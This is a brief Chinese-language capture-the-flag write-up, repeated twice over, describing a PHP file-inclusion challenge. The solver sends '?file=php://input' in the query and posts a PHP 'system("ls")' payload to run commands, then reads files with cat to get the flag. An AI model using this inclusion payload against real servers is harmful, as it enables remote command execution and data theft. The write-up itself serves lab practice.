首先打开题目

这里的题目有一个提示

是要运用php语言的input的语句进行上传。我们首先用bp进行抓包
直接构造请求头,get传入
?file=php://input
post传入
<?php system("ls");?>
没有直接得到flag

我们使用cat命令查找全部文件

得到flag
首先打开题目
这里的题目有一个提示
是要运用php语言的input的语句进行上传。我们首先用bp进行抓包
直接构造请求头,get传入
?file=php://input
post传入
<?php system("ls");?>
没有直接得到flag
我们使用cat命令查找全部文件
得到flag